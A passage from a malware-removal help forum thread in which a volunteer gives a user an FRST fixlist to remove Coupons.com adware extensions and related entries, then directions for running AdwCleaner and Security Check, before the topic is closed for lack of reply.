FF HKLM-x32\...\Firefox\Extensions: [{1C43BAF1-00C2-40A8-A09E-F84CFD79546D}] - C:\Program Files (x86)\Coupons.com CouponBar\firefox\{1C43BAF1-00C2-40A8-A09E-F84CFD79546D}\Coupons.com.xpi
FF Extension: Coupons.com CouponBar - C:\Program Files (x86)\Coupons.com CouponBar\firefox\{1C43BAF1-00C2-40A8-A09E-F84CFD79546D}\Coupons.com.xpi [2014-03-12]
CHR Extension: (Coupons.com Toolbar) - C:\Users\hstagner\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnpkmcjgpcihgfnkcjapiaabbbplkcmf [2014-05-15]
CHR Extension: (Google Wallet) - C:\Users\hstagner\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-10-09]
CHR HKLM-x32\...\Chrome\Extension: [cnpkmcjgpcihgfnkcjapiaabbbplkcmf] - C:\Program Files (x86)\Coupons.com CouponBar\chrome\Coupons.com.crx [2013-07-15]
R2 CouponPrinterService; C:\Program Files (x86)\Coupons\CouponPrinterService.exe [177648 2014-03-28] (Coupons.com Inc.)
U3 tmpfw; No ImagePath
AlternateDataStreams: C:\ProgramData\TEMP:0574215C
AlternateDataStreams: C:\ProgramData\TEMP:D95ACC7D
 
End
Save the files as fixlist.txt into the same folder as FRST
 
Run FRST and click Fix only once and wait.
 
Restart the computer normally to reset the registry.
 
The tool will create a log (Fixlog.txt) please post it to your reply.
===
 
Please download AdwCleaner by Xplode onto your Desktop.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click the Scan button and wait for the process to complete.
  • Click the Report button and the report will open in Notepad.
  • IMPORTANT
  • If you click the Clean button all items listed in the report will be removed.
  • If you find some false positive items or programs that you wish to keep, Close the AdwCleaner windows.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click the Scan button and wait for the process to complete.
  • Check off the element(s) you wish to keep.
  • Click on the Clean button follow the prompts.
  • A log file will automatically open after the scan has finished.
  • Please post the content of that log file with your next answer.
  • You can find the log file at C:\AdwCleaner[Sn].txt (n is a number).
  • ===
     
    Download Security Check by screen317 from here.
  • Save it to your Desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document.
  • p.s.
    If the SecurityCheck program fails to run for any reason, run it as an Administrator.
     
    If the site is busy or not available use this mirror site:
     
    How is the computer running now?


    #3 nasdaq

    nasdaq

    • Malware Response Team
    • 40,213 posts
    • ONLINE
    •  
    • Gender:Male
    • Location:Montreal, QC. Canada
    • Local time:03:09 PM

    Posted 24 November 2014 - 09:36 AM

    Due to the lack of feedback, this topic is now closed.

    In the event you still have problems, please send me or any Moderator a Private Message and ask them to reopen this topic within the next 5 days.

    Please include a link to your topic in the Private Message. Thank you.




    0 user(s) are reading this topic

    0 members, 0 guests, 0 anonymous users